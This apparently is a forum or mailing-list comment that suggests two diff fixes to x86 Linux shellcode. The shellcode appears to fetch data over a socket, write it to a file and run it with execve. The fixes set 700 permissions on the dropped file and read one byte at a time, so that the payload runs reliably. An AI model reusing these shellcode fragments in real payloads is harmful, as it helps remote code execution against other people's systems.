Hi,
I just spent a couple of hours with this shellcode and ran into two issues:
First, the output file was created with -----x--- permissions, which causes execve to fail with permission denied. I modified it to use rwx------:
```diff
  "\x89\xe3"             // mov %esp,%ebx
  "\x50"                 // push %eax
+ "\x68\xc0\x01\x01\x01" // pushl 700 permissions
  "\x59"                 // pop %ecx
  "\xcd\x80"             // int $0x80
  "\x96"                 // xchg %eax,%esi
```
Second, the read/write loop uses a size of 4 bytes. This causes failures when the socket returns less than 4 bytes but we still write 4 bytes. Switching the size to 1 works reliably.
```diff
  "\x81\x39\x0a\x0d\x0a\x0d" // cmpl $0xd0a0d0a,(%ecx)
  "\x75\xf3"                 // jne <_wait_for_dbl_crlf>
- "\xb2\x04"                 // mov $0x4,%dl
+ "\xb2\x01"                 // mov $0x1,%dl
  //
  // <_dump_loop_do_read>:
```
Sorry for not sending this as a patch, but these are still hackish and at the moment I don't have time to clean it up.